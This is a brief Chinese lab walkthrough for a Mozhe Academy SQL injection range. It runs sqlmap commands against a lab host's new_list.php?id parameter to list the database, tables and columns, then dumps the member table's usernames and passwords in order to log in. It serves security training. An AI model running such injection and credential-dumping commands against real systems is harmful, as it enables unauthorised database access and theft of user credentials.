SQL手工注入漏洞测试(MySQL数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养
环境:主机
工具:sqlmap
1.首先打开靶场
2.对该网页直接用sqlmap
3.记得换换url,查当前数据库
python3 sqlmap.py -u "http://124.70.64.48:45745/new_list.php?id=1" --current-db
4.查表
python3 sqlmap.py -u "http://124.70.64.48:45745/new_list.php?id=1" -D mozhe_Discuz_StormGroup --tables
5.查字段
python3 sqlmap.py -u "http://124.70.64.48:45745/new_list.php?id=1" -D mozhe_Discuz_StormGroup -T StormGroup_member --column
6.查账号密码
python3 sqlmap.py -u "http://124.70.64.48:45745/new_list.php?id=1" -D mozhe_Discuz_StormGroup -T StormGroup_member --dump
7.登录